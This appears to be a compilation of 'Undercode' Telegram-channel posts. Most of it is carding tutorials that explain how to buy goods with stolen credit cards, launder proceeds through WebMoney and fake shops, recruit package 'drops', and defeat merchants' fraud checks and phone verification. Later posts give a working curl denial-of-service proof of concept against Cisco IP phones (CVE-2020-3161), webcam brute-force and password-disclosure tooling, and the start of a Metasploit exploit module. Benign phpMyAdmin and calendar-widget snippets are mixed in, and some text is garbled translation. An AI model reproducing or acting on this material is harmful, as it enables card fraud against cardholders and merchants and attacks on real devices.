▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CARDING PART 3 :

> CC virtual combing method-break into yourself

1) This method allows you to buy a domain name for cardholder information and sell it to WM currency. There are many online services where you can purchase professional templates for ready-made projects or websites. You can also use other people's credit cards to buy and sell through an effective payment system.

2) There is another option to trade with yourself. You have established a website that sells any service or software. You must build a website that will not cause suspicion from potential buyers. Take care of the design, text and services you should provide. After creating the website, register an account with the seller, lower the market price and move it all to your own website.

4) But this is not the end. In order for buyers to continue to trust you, you need to buy traffic for CC. Make sure that as many people as possible visit your website and then purchase the service yourself (anonymously). The seller should not doubt anything. As long as you have enough time and energy, you can create multiple such websites. After trading with yourself, withdraw funds through WebMoney.

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CARDING trick 4

1) CC Virtual Carding Method-Promotion Service

This is the easiest way to make money using combing. You need to visit any forum and use the domain name to promote your hosting service there.


2) The proposal must also indicate that the payment should be made on WebMoney.

3) After receiving the order, you must visit the Hostonce website and enter the purchased CC in the required field.

4) example on undercode sites the accuracy of information is rarely checked, so it is ideal for us. In addition, one advantage is that the website you registered will most likely never be closed, and your conscience will be clear. The next day you need to simply withdraw the money earned from WebMoney.

🦑 CC virtual combing method-porn

1) The last way to make money is as simple as the previous one. In fact, with it, you hardly need to do anything.

2) You should Google provide a list of adult sponsors of off-the-shelf sex shops. The store sponsor provides you with the percentage of sales of the selected website mentioned above, and pays the referral fee.

3) The next step is to pretend (including another IP) that you are a buyer of a sex shop. Of course, you will pay for the purchase with the help of the stolen CC. Then, for each purchase, you will receive the percentage specified by the sponsor. Usually, it does not exceed 30%. If the sponsor does not use WebMoney, you need to exchange the currency received and then withdraw funds from WebMoney.

3) This method is very good because you don't need to disturb the details, create different stories, change the billing address, etc. It takes a little time and makes a profit. You will not use other methods, but it is a perfect way in terms of time / money.

4) Therefore, I describe to you the main way to make money using other people's CC. You have to decide for yourself which method is best for you and whether they are suitable for you.

5) Maybe combing is not your call. But remember, with the help of combing, you can make huge profits and ensure a prosperous future. By combining different income methods, you can earn more than a few thousand dollars per month. Sounds good?

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CARDING : Virtual combing guide trick 5 :) by undercode

Using other people's CCs to buy goods is no more complicated than buying products from online stores. Instead of your information
, you need to fill in information about other people's cards and their owners

🦑 So, what do we need to get a profitable virtual carding?

1) The most critical point is to purchase CC and dedicated server. CC helps you make purchases profitable, and dedicated servers – secure.

2) We also need to make a list of stores suitable for virtual combing (shipping to the country we need; the opportunity to pay for the purchase cost with a card). Carders also need to understand that different stores have different forms of cardholder verification, different customer methods, and so on. Main rule: Want to successfully complete the purchase-use creativity.

🦑 Step by step virtual combing instructions:

1) Purchase CC. Purchasing information about credit cards and cardholders can put the information on themselves. Some online stores do not require VBV codes, even if it is in CC. But when buying electronic products, they will most likely ask you to specify the code. Therefore, buying a CC with a VBV code depends on what kind of purchase you will make.

2) example We buy a dedicated server. Please note that the server location should be as close as possible to the location of the cardholder.

3) We are looking for the right store. I have written which stores are very suitable for trucks and which are not.

4) We need to register for an email. It's best to register an email with a "com" ending. Also, make sure that the email looks as abstract as possible, suitable for girls and boys.

5.)Turn on the dedicated server.

6)When purchasing in the online market, enter the cardholder's data. You also need to consider that the store may not allow you to enter your own address and send it to the address registered in CC.

> This option is not suitable for us. You need to find a store that will provide different billing and shipping addresses and can also be delivered to the country you need. If you still want to order from a store that only sends to the billing address, please write how to change the billing address to your own billing address in the article on Enrolls.

7) If you want to shop at the same address multiple times, you should specify the neighbor's address, change the name and surname, etc. Make every effort not to cause doubt.

If you have any questions, please call the store yourself. Don't be afraid to act, because your money depends on it ..


Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 we post for learn not for steal

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CARDING TRICK 5 -xd this one posted on depweb by undercode-for secure yourself :
> Successful virtual clothing combing skills
t.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Open your imagination and make your purchases approved by more and more stores. For example, remember that Americans usually shop for lunch or evening. This means that if you make a purchase at this time, it will first cause more trust. Second, hundreds of Americans will make purchases with you at the same time, and store employees cannot actually verify all the data. Also, pay attention to the Christmas holidays (or any other holidays)
er holidays).

> Thousands of people want to buy gifts for their loved ones or themselves. People buy various new and old products, which are both expensive and cheap. The online store should hire other workers who are not familiar with the verification system + they will not suspect that you are fraud. But when shopping on holidays, please remember that your order can only be approved within a few days. During this period, the cardholder will have time to see the loss of money, contact the bank and credit card will be blocked, and your order will not be sent.

2) Another tip is that you need to carefully choose a credit card for the online store. Your credit card must match the country (and sometimes even the city). In this case, you can give full play to your creativity and come up with an interesting story, want to give gifts to relatives living in the same country (city) as you.

3) I also recommend that you purchase a credit card that can be accessed online. Using the information you purchased, you can go to the cardholder ’s personal account and change all the data you need (bill address, phone number, email).

4) If the billing and shipping addresses match, the store will have no doubt that you are the cardholder and approve your order almost immediately. But it is also important to understand that the bank may not change your billing address, or the holder will see the changed information and block the credit card.

5) Choose the online store correctly. Check if it has the factors you need, size, delivery method, etc. You should not place orders in a huge market because they are likely to have an excellent anti-fraud system. It is best to choose a small online store where a few of the workers will not suspect that you are a liar. Buyers do not usually shop in such online stores, so store owners cannot hire qualified personnel to track shoppers ’purchases.

6) If the store suspects that you are a real cardholder, online support can use the phone to query all necessary information or ask you to scan your credit card. Experienced seniors know that with a small amount of money, they can hire someone who scans credit cards, and it looks just as convincing as the original.

7) But you have to solve the problem by phone yourself. You have several ways to solve this problem: let your phone call through the phone instead of you, or find someone else who agrees to make fake calls. Don't forget to give him CC and warn to speak on behalf of another person. If you want to call yourself, you need to dial a virtual phone number. This can be done using Skype. Do n’t forget that the phone code must match the country code drop. Also, make sure you do n’t give stress or even some details.

🦑 As Australia and New Zealand are far from another world, online shopping has become very popular there. The online store without any problems accepts orders and sends packages around the world. But there are also difficulties. For example, the rarity of Australian or New Zealand cards in the market. Moreover, they are much more expensive than ordinary CCs because they are more difficult to obtain.
Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CARDING DROPPING NOW 🙈:
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

»Congratulations, your order has been sent! But this is not all the problems that need to be solved. The fact that the store sends the package does not mean that it is in your hands. It happened that the police caught your fall, or he / she turned out to be a scam. Therefore, the correct descent must be selected, which will perfectly complete his / her work.

🦑 There are two recruitment methods:

1) Warn him that you are a virtual truck, illegal orders will come to him. At first glance, this method has no advantage, because few people will agree to participate in the carding process. But in fact, everything is different. If descent agrees, he will correctly understand the nature of his work and you will be able to ask him / her to help you. For example, he can call support and introduce himself as a cardholder.

2) Don't tell anything. He would think that he participated in absolutely legal procedures and would not raise any other questions. According to my personal experience, this has many disadvantages rather than advantages. The drop will accidentally handle the package + cannot help you anyway. For example, there is a situation when Card sends a package to Blob. Dropped out of home, the package was sent back to the store. Of course, Card did n’t get his package and could n’t order again. The money is lost.

» In some cases, when the package is received, but the address is wrong when sending, and the sender did not receive the package.

🦑 Virtual combing is still profitable

1) Although there are many problems with virtual combing, it is still a very profitable income. You can solve all the obstacles placed by banks and shops if you pay a little money or think
enough.

2) You need to understand that the results of combing do not depend on the anti-fraud system, but on the store employees who approve your order. His decision can always be changed through a long story, because it is a gift from your wife, or important to you for other reasons. But if you get a stubborn worker, then you are powerless. Never forget the human factor, if things don't succeed, don't be discouraged. It will operate next time.

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 LET S START SOME PHP TUTORIALS BY UNDERCODE-FAST TIPS

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install phpmyadmin under Linux? BY UNDERCODE


1) When installing fedora, select the basic components that should be selected, including Appache, mysql, and php, but when we manage the database, it is still more convenient to have a graphical interface, so we install phpmyadmin ourselves , The installation is very simple.

2) phpMyAdmin is a MySQL management tool that manages MySQL directly from the web.

3) Assuming your web (webpage storage) root directory is / var / www / assuming your host web access is like this http://192.168.1.11/

4) You can install it to / var / www / phpmyadmin or of course any subordinate directory of / var / www /

Note that the name of this directory is best known only to the administrator. Therefore, we assume / var / www / onlyyouknow

A. First go to the official website of phpMyAdmin to download the latest phpMyAdmin program

http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.11.3-all-languages.tar.gz

Download phpMyAdmin-2.11.3-all-languages.tar.bz2 to / var / www /

#cd / var / www /

#wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.11.3-all-languages.tar.gz

Of course, you can also go to your own windows machine, and later upload it to the web server after editing it

B. Unzip this file

# tar zxvf phpMyAdmin-2.11.3-all-languages.tar.gz

At this time the path /var/www/phpMyAdmin-2.11.3-all-languages

C. Change the directory name to / var / www / onlyyoukown

# mv /var/www/phpMyAdmin-2.11.3-all-languages / var / www / onlyyoukown

D. Modify the configuration file

1. Find the /libraries/config.default.php file (copy config.default.php to the phpmyadmin directory, and then rename it to config.inc.php), the file has the following items (2-8) must be configured by yourself Wordpad (do not use Notepad, this is UTF8 encoding) for editing, directly edit with vim under linux.

2. Find $ cfg ['PmaAbsoluteUri'] and change it to the phpMyAdmin URL that you will upload to the space

For example: $ cfg ['PmaAbsoluteUri'] = 'http://192.168.1.11/onlyyouknow/';

3. Find $ cfg ['Servers'] [$ i] ['host'] = 'localhost'; (usually use the default, there are exceptions, you can not modify)

4. Find $ cfg ['Servers'] [$ i] ['auth_type'] = 'config';

Use config for debugging in your own machine; if you use cookies in the space on the network, since we have added the URL in the front, we will modify it to a cookie. Here we recommend using cookies.

5. Find $ cfg ['Servers'] [$ i] ['user'] = 'root'; // MySQL user (mysql user name, use root in your machine;)

6. Find $ cfg ['Servers'] [$ i] ['password'] = ''; // MySQL password (mysql user's password, his server is generally the password of the mysql user root)

7. Find $ cfg ['Servers'] [$ i] ['only_db'] = ''; // If set to a db-name, only (set it if you only have one data; if you are on this machine Set up the server, it is recommended to leave it blank)

8. Find $ cfg ['DefaultLang'] = 'zh'; (Here is the choice of language, zh stands for Simplified Chinese, I do n’t know whether to fill in gbk or not)

9. Save after setting

If “The configuration file now requires the top secret phrase password (blowfish_secret)”, then please set the cookie of your website in the equal sign of $ cfg ['blowfish_secret'] = ''; Any character '; This is because of your "$ cfg [' Servers'] [$ i] ['auth_type'] = 'cookie'.

E. Test

Open the browser, http://192.168.1.11/onlyyoukown/

A little personal opinion

We think that it is not a very safe way to control mysql through the root user of mysql from the web. So my suggestion is that if it is your own server, you can put the phpadmin directory into a directory that the web cannot access when you run out. Use it to move the entire directory back to its original location with the mv command.

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Forward something Php guide by Undercode :
twitter.com/undercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


<style type="text/css">
body {
background-color: #D4D0C8;
}
.m_fieldset {
padding: 0,10,5,10;
text-align: center;
width: 150px;
}
.m_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.m_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
width: 100px;
height: 19px;
background-color: #FFFFFF;
overflow: hidden;
text-align: right;
font-family: "Tahoma";
font-size: 10px;
}
.m_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.m_input {
width: 18px;
height: 14px;
border: 0px solid black;
font-family: "Tahoma";
font-size: 9px;
text-align: right;
ime-mode:disabled;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/15
function minute(name,fName)
{
this.name = name;
this.fName = fName || "m_input";
this.timer = null;
this.fObj = null;

this.toString = function()
{
var objDate = new Date();
var sMinute_Common = "class=\"m_input\" maxlength=\"2\" name=\""+this.fName+"\" onfocus=\""+this.name+".setFocusObj(this)\" onblur=\""+this.name+".setTime(this)\" onkeyup=\""+this.name+".prevent(this)\" onkeypress=\"if (!/[0-9]/.test(String.fromCharCode(event.keyCode)))event.keyCode=0\" onpaste=\"return false\" ondragenter=\"return false\"";
var sButton_Common = "class=\"m_arrow\" onfocus=\"this.blur()\" onmouseup=\""+this.name+".controlTime()\" disabled"
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">"
str += "<tr>"
str += "<td>"
str += "<div class=\"m_frameborder\">"
str += "<input radix=\"24\" value=\""+this.formatTime(objDate.getHours())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getMinutes())+"\" "+sMinute_Common+">:"
str += "<input radix=\"60\" value=\""+this.formatTime(objDate.getSeconds())+"\" "+sMinute_Common+">"
str += "</div>"
str += "</td>"
str += "<td>"
str += "<table border=\"0\" cellspacing=\"2\" cellpadding=\"0\">"
str += "<tr><td><button id=\""+this.fName+"_up\" "+sButton_Common+">5</button></td></tr>"
str += "<tr><td><button id=\""+this.fName+"_down\" "+sButton_Common+">6</button></td></tr>"
str += "</table>"
str += "</td>"
str += "</tr>"
str += "</table>"
return str;
}
this.play = function()
{
this.timer = setInterval(this.name+".playback()",1000);
}
this.formatTime = function(sTime)
{
sTime = ("0"+sTime);
return sTime.substr(sTime.length-2);
}
this.playback = function()
{
var objDate = new Date();
var arrDate = [objDate.getHours(),objDate.getMinutes(),objDate.getSeconds()];
var objMinute = document.getElementsByName(this.fName);
for (var i=0;i<objMinute.length;i++)
{
objMinute[i].value = this.formatTime(arrDate[i])
}
}
this.prevent = function(obj)
{
clearInterval(this.timer);
this.setFocusObj(obj);
var value = parseInt(obj.value,10);
var radix = parseInt(obj.radix,10)-1;
if (obj.value>radix||obj.value<0)
{
obj.value = obj.value.substr(0,1);
}
}
this.controlTime = function(cmd)
{
event.cancelBubble = true;
if (!this.fObj) return;
clearInterval(this.timer);
var cmd = event.srcElement.innerText=="5"?true:false;
var i = parseInt(this.fObj.value,10);
var radix = parseInt(this.fObj.radix,10)-1;
if (i==radix&&cmd)
{
i = 0;
}
else if (i==0&&!cmd)
{
i = radix;
}
else
{
cmd?i++:i--;
}
this.fObj.value = this.formatTime(i);
this.fObj.select();
}
this.setTime = function(obj)
{
obj.value = this.formatTime(obj.value);
}
this.setFocusObj = function(obj)
{
eval(this.fName+"_up").disabled = eval(this.fName+"_down").disabled = false;
this.fObj = obj;
}
this.getTime = function()
{
var arrTime = new Array(2);
for (var i=0;i<document.getElementsByName(this.fName).length;i++)
{
arrTime[i] = document.getElementsByName(this.fName)[i].value;
}
return arrTime.join(":");
}
}
</script>

<style type="text/css">
body {
background-color: #D4D0C8;
}
.c_fieldset {
padding: 0,10,5,10;
text-align: center;
width: 180px;
}
.c_legend {
font-family: Tahoma;
font-size: 11px;
padding-bottom: 5px;
}
.c_frameborder {
border-left: 2px inset #D4D0C8;
border-top: 2px inset #D4D0C8;
border-right: 2px inset #FFFFFF;
border-bottom: 2px inset #FFFFFF;
background-color: #FFFFFF;
overflow: hidden;
font-family: "Tahoma";
font-size: 10px;
width:160px;
height:120px;
}
.c_frameborder td {
width: 23px;
height: 16px;
font-family: "Tahoma";
font-size: 11px;
text-align: center;
cursor: default;
}
.c_frameborder .selected {
background-color:#0A246A;
width:12px;
height:12px;
color:white;
}
.c_frameborder span {
width:12px;
height:12px;
}
.c_arrow {
width: 16px;
height: 8px;
font-family: "Webdings";
font-size: 7px;
line-height: 2px;
padding-left: 2px;
cursor: default;
}
.c_year {
font-family: "Tahoma";
font-size: 11px;
cursor: default;
width:55px;
height:19px;
}
.c_month {
width:75px;
height:20px;
font:11px "Tahoma";
}
.c_dateHead {
background-color:#808080;
color:#D4D0C8;
}
</style>

<script language="javascript">
// Written by cloudchen, 2004/03/16
function calendar(name,fName)
{
this.name = name;
this.fName = fName || "calendar";
this.year = new Date().getFullYear();
this.month = new Date().getMonth();
this.date = new Date().getDate();
//private
this.toString = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"3\" cellpadding=\"0\" onselectstart=\"return false\">";
str += "<tr>";
str += "<td>";
str += this.drawMonth();
str += "</td>";
str += "<td align=\"right\">";
str += this.drawYear();
str += "</td>";
str += "</tr>";
str += "<tr>";
str += "<td colspan=\"2\">";
str += "<div class=\"c_frameborder\">";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" class=\"c_dateHead\">";
str += "<tr>";
str += "<td>日</td><td>一</td><td>二</td><td>三</td><td>四</td><td>五</td><td>六</td>";
str += "</tr>";
str += "</table>";
str += this.drawDate();
str += "</div>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//private
this.drawYear = function()
{
var str = "";
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">";
str += "<tr>";
str += "<td>";
str += "<input class=\"c_year\" maxlength=\"4\" value=\""+this.year+"\" name=\""+this.fName+"\" id=\""+this.fName+"_year\" readonly>";
//DateField
str += "<input type=\"hidden\" name=\""+this.fName+"\" value=\""+this.date+"\" id=\""+this.fName+"_date\">";
str += "</td>";
str += "<td>";
str += "<table cellspacing=\"2\" cellpadding=\"0\" border=\"0\">";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value++;"+this.name+".redrawDate()\">5</button></td>";
str += "</tr>";
str += "<tr>";
str += "<td><button class=\"c_arrow\" onfocus=\"this.blur()\" onclick=\"event.cancelBubble=true;document.getElementById('"+this.fName+"_year').value--;"+this.name+".redrawDate()\">6</button></td>";
str += "</tr>";
str += "</table>";
str += "</td>";
str += "</tr>";
str += "</table>";
return str;
}
//priavate
this.drawMonth = function()
{
var aMonthName = ["一","二","三","四","五","六","七","八","九","十","十一","十二"];
var str = "";
str += "<select class=\"c_month\" name=\""+this.fName+"\" id=\""+this.fName+"_month\" onchange=\""+this.name+".redrawDate()\">";
for (var i=0;i<aMonthName.length;i++) {
str += "<option value=\""+(i+1)+"\" "+(i==this.month?"selected":"")+">"+aMonthName[i]+"月</option>";
}
str += "</select>";
return str;
}
//private
this.drawDate = function()
{
var str = "";
var fDay = new Date(this.year,this.month,1).getDay();
var fDate = 1-fDay;
var lDay = new Date(this.year,this.month+1,0).getDay();
var lDate = new Date(this.year,this.month+1,0).getDate();
str += "<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" id=\""+this.fName+"_dateTable"+"\">";
for (var i=1,j=fDate;i<7;i++)
{
str += "<tr>";
for (var k=0;k<7;k++)
{

str += "<td><span"+(j==this.date?" class=\"selected\"":"")+" onclick=\""+this.name+".redrawDate(this.innerText)\">"+(isDate(j++))+"</span></td>";
}
str += "</tr>";
}
str += "</table>";
return str;

function isDate(n)
{
return (n>=1&&n<=lDate)?n:"";
}
}
//public
this.redrawDate = function(d)
{
this.year = document.getElementById(this.fName+"_year").value;
this.month = document.getElementById(this.fName+"_month").value-1;
this.date = d || this.date;
document.getElementById(this.fName+"_year").value = this.year;
document.getElementById(this.fName+"_month").selectedIndex = this.month;
document.getElementById(this.fName+"_date").value = this.date;
if (this.date>new Date(this.year,this.month+1,0).getDate()) this.date = new Date(this.year,this.month+1,0).getDate();
document.getElementById(this.fName+"_dateTable").outerHTML = this.drawDate();
}
//public
this.getDate = function(delimiter)
{
if (!delimiter) delimiter = "/";
var aValue = [this.year,(this.month+1),this.date];
return aValue.join(delimiter);
}
}
</script>
<table border="0">
<tr><td>
<fieldset class="c_fieldset"><legend class="c_legend">日期(T)</legend>
<script>
var c = new calendar("c");
document.write(c);
</script>

</fieldset>
</td>
<td valign="top">
<fieldset class="m_fieldset"><legend class = "m_legend"> Time (T) </ legend> var m = new minute ("m"); <script>
><!-Call Time


m.play();
document.write(m);
</script>
</fieldset>
</td></tr>
<tr>
<td colspan="2">
<button onclick="alert(c.getDate())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetDate</button>

<button onclick="alert(m.getTime())" style="font:8px Webdings;width:15px;height:15px;line-height:6px;">4</button>
<button style="font:10px Arial;height:15px;height:16px;border:0px;" onfocus="this.blur()">GetTime</button>

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Those php guide by undercode is gpood for now let s send some termux-linux tips & some accounts

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Exploite Old webcam

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

What does the tool to? Look, a list!

> Search

> Brute force

> SSID and WPAPSK Password Disclosure

> E-mail, FTP, DNS, MSN Password Disclosure

> Exploit

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

cd /opt/

$ git clone https://github.com/fbctf/shodanwave.git

$ cd shodanwave

$ pip install -r requirements.txt

Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k
Shodan API key --t OUTPUT

python shodanwave.py --help

🦑Modify your Tsocks config!!

Add/Modify the following at the bottom:
server =
server_type = <4 or 5>
server_port =
default_pass = (Might be required for proxy)

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Easy way to brute-force web directory.


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


1) git clone https://github.com/abaykan/crawlbox.git

2) cd crawlbox/

3) pip install -r requirements.txt

python crawlbox.py -h
url specific target url, like domain.com
optional arguments:

-h, --help show this help message and exit
-v, --version show program's version number and exit
-w WORDLIST specific path to wordlist file
-d DELAY add delay between requests

🦑MacOSX
Kali Linux
Ubuntu 16.04

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑# Exploit Title: Cisco IP Phone 11.7 TESTED BY UNDERCODE ‼️


- Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24

curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VMWARE 2020 EXPLOIT TESTED BY UNDERCODE :
AVAIBLE AT DEEPWEB & EXPLOITE DB :


🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::OSX::Priv
include Msf::Post::File
include Msf::Exploit::EXE
